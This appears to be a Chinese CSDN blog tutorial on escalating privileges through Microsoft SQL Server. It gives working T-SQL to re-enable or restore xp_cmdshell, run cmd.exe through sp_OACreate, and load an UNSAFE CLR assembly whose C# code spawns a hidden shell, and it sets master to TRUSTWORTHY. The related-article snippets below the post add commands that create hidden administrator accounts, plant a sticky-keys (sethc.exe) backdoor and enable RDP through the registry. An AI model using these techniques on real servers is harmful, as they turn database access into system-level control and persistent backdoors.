SQL Server提权系列

最新推荐文章于 2024-03-28 16:37:48 发布
最新推荐文章于 2024-03-28 16:37:48 发布
阅读量178 收藏
点赞数
文章标签: microsoft .net c# 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77152761/article/details/130129675
版权
本文介绍了三种SQLServer权限提升的方法:利用xp_cmdshell通过配置和恢复dll实现提权;使用SP_OACreate结合OleAutomationProcedures配置执行wscript.shell命令;以及通过SQLServerCLR集成执行自定义的不安全存储过程进行提权。每种方法都详细阐述了步骤和所需权限。
摘要由CSDN通过智能技术生成

一、利用xp_cmdshell提权#

xp_cmdshell默认是关闭的,可以通过下面的命令打开

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

如果xp_cmdshell被删除了,可以上传xplog70.dll进行恢复

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'

二、利用SP_OACreate提权#

首先执行如下命令

EXEC sp_configure 'show advanced options', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'Ole Automation Procedures', 1;   
RECONFIGURE WITH OVERRIDE;   
EXEC sp_configure 'show advanced options', 0;

然后通过以下命令提权

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >d:\\temp\\1.txt'

查看1.txt获取相关信息

三、利用SQL Server CLR提权#

Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework

的公共语言运行时 (CLR) 组件集成的功能

CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。

对于 SQL Server 用户和应用程序开发人员来说

CLR 集成意味着您现在可以使用任何 .NET Framework 语言

(包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#)

编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

要通过此种方式来执行命令,也有几个前提:

1、在SQL Server上能启用CLR并可以创建自定义存储过程
2、SQL Server当前账号具有执行命令/代码所需要的权限

创建CLR有两种方式

第一种就是通过DLL创建

CREATE ASSEMBLY AssemblyName from ‘DLLPath’

第二种就是通过文件十六进制流

CREATE ASSEMBLY AssemblyName from 文件十六进制流

1、安装Visual Studio和SQL Server数据库,此次测试使用了VS2017跟SQL2012。

2、创建一个新的SQL Server数据库项目

3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;

将SQLCLR权限级别修改为UNSAFE;修改.Net 框架版本为自己需要的版本;语言选择C#

4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程

5、填入以下测试代码:

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.Collections.Generic;
using System.Text;
using System.Threading.Tasks;
public partial class StoredProcedures
{
    [Microsoft.SqlServer.Server.SqlProcedure]
    public static void SqlStoredProcedure1 ()
    {
        // 在此处放置代码
        System.Diagnostics.Process process = new System.Diagnostics.Process();
        process.StartInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
        process.StartInfo.FileName = "cmd.exe";
        process.StartInfo.Arguments = "/C whoami > c:\\temp\\1.txt";
        process.Start();
    }
}

6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件

7、双击此文件进行解压,将解压出一个名为mode.sql的文件。

8、执行SQL文件中的以下语句

​
CREATE ASSEMBLY [ExecCode]
    AUTHORIZATION [dbo]
    FROM 0x4D5A[...snip...]
    WITH PERMISSION_SET = UNSAFE;
之后执行:

CREATE PROCEDURE [dbo].[SqlStoredProcedure1]
AS EXTERNAL NAME [ExecCode].[StoredProcedures].[SqlStoredProcedure1]
9、开启数据库服务器配置选项clr enabled



EXEC sp_configure N'show advanced options', N'1' 
RECONFIGURE WITH OVERRIDE
​
--开启clr enabled 选项
EXEC sp_configure N'clr enabled', N'1'
RECONFIGURE WITH OVERRIDE 
​
--关闭所有服务器配置选项
EXEC sp_configure N'show advanced options', N'0' 
RECONFIGURE WITH OVERRIDE
​
--如果存在权限问题,执行下面一段脚本
alter database [master] set TRUSTWORTHY on
EXEC sp_changedbowner 'sa'
​

10、执行命令:

EXEC [dbo].[SqlStoredProcedure1];

11、删除存储过程

DROP PROCEDURE [dbo].[SqlStoredProcedure1];
DROP ASSEMBLY ExecCode

白帽小婀
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Windows权限提升 —SQL Server/MSSQL数据库提权
剁椒鱼头没剁椒的博客
03-21 2206
在之前的Windows权限提升—MySQL数据库提权中已经介绍了关于数据库方面的权限提升,同时在Windows权限提升—溢出提权的时候,简要的介绍了关于Windows提权方面整体的流程与方式,这里就不再赘述,直接进行Windows权限提升—SQL Server/MSSQL数据库的提权SQL Server与MSSQL其实就是一个东西,只是叫法不同。Windows权限提升—MySQL数据库Windows权限提升—溢出提权
SQLserver提权
一个普普通通的博客
04-17 2919
SQLserver提权
sqlserver提权
YouthBelief的博客
12-19 1642
1.xp_cmdshell提权 默认在sqlserver2000中开启,2005后默认禁止,使用sp_configure重新打开它 sa权限下 使用xp_cmdshell可以 以system权限执行操作系统命令。 开启xp_cmdshell exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell',1; reconfigure; 关闭xp_cmdshell exec sp_confi
SQL Server 数据库常见提权总结
最新发布
m0_64481831的博客
03-28 2230
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库的提权
MSSql 提权
07-23
通过对MSSQL提权的分析,我们可以看到整个过程中涉及到了SQL查询、表操作、备份机制、系统命令执行等多个方面的知识。这些技术点不仅对于渗透测试人员来说非常重要,同时也提醒了我们在实际应用MSSQL Server时需要...
mssql,mysqll注入语法.zip_KMF_security_提权
09-24
标题“mssql,mysqll注入语法.zip_KMF_security_提权”表明这个压缩包文件主要关注的是SQL注入攻击相关的知识,特别是针对Microsoft SQL Server(mssql)和MySQL(通常拼写为mysql)数据库系统的安全问题。...
星外提权目录
01-03
"星外提权目录"则是指在进行此类操作时,可以利用的一系列具有较高权限访问特性的目录。这些目录往往由于默认配置不当或安全策略疏漏,允许低权限用户进行读取、写入或执行操作,从而成为攻击者实现权限升级的重要...
1433专业提权命令
07-26
#### SQL Server提权示例 - **对于Windows 2000 Server系统**: - 使用`sp_oacreate`和`wscript.shell`创建脚本来执行`cmd.exe`中的命令,包括创建用户和将其添加到管理员组。 - **对于Windows XP 2003 Server系统...
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
易语言 SQL提权工具 源码
09-16
易语言编写SQL server 2000 提权工具 源码
SQL Server 存储过程提权方法
PaidaxingSec的博客
02-08 896
SQL Server 存储过程提权方法
sql-server 提权
dieqiang4646的博客
09-19 188
  数据库开启cmdshell EXEC sp_configure 'show advanced options', 1 GO RECONFIGURE GO EXEC sp_configure 'xp_cmdshell',1 GO RECONFIGURE GO EXEC master..xp_cmdshell 'net use Z: \\192.168.11...
[WEB安全]MSSQL/SQL Server 提权手法详解
网络安全知识分享
12-17 7287
SQL Server 提权手法详解一、SQL Server 的安装二、SQL Server SA用户的添加三、原理四、xp_cmd提权过程五、OLE提权过程六、xp_regread & xp_regwrite克隆账号 环境:Win10 、SQL Server 2008 一、SQL Server 的安装 介绍: ​ Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 点击exe后
SQL提权
小向资源网博客
08-15 949
UDF手工提权辅助: select @@basedir;  #查看mysql安装目录 select 'It is dll' into dumpfile 'C:\。。lib::';  #利用NTFS ADS创建lib目录 select 'It is dll' into dumpfile 'C:\。。lib\plugin::';  #利用NTFS ADS创建plugin目录 select 0...
第三方组件提权-SQL server提权
Love&Share
11-20 2585
文章目录基础MSSQL权限级别拿webshellxp_cmdshell执行系统命令LOG备份getshell提权使用xp_cmdshell进行提权以下内容为转载使用sp_oacreate进行提权|无回显sp_oacreate简介sp_oacreate使用沙盒提权SQL Server 沙盒简介JOB提权使用xp_regwrite提权 | 映像劫持提权其他骚操作使用sp_makewebtask写文件总结二级内网MSSQL渗透|上线CS 基础 MSSQL(MicroSoft SQL Server数据库),是微软.
SQL server提权_环境实操wp
CHUNJIUJUN的博客
08-17 279
拿到IP,先进去看看,发现啥都没有 上nmap和御剑扫一下端口 没扫到啥新鲜的端口,去8080端口看看 是个登录框,试了试弱口令什么的都不行,上御剑扫一下目录 发现一个www.zip,进去试试 发现一个config文件 拿到了数据库账号密码,登上去看看 拿到一个key,再找找 拿到管理员账号密码,从8080端口登进去看看 没登上去,发现密码是拿md5加密了,解密一下为 woaini521 成功登进去,拿到key 找了找其他地方...
SQlserver提权方法
good good study
05-24 2128
sql server提权(执行命令)主要依赖于sql server自带的存储过程。目的:sqlserver权限 —> 系统权限存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使用execute命令执行存储过程。主要分为系统存储过程、扩展存储过程、用户自定义的存储过程三大类。
sql server提权
06-02
SQL Server 中,提权通常指以低权限用户的身份执行代码,然后获取 SA 或其他高级别权限的访问权限。以下是一些 SQL Server 提权的方法: 1. 使用 SQL Server 服务帐户进行提权 如果 SQL Server 服务帐户(通常为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值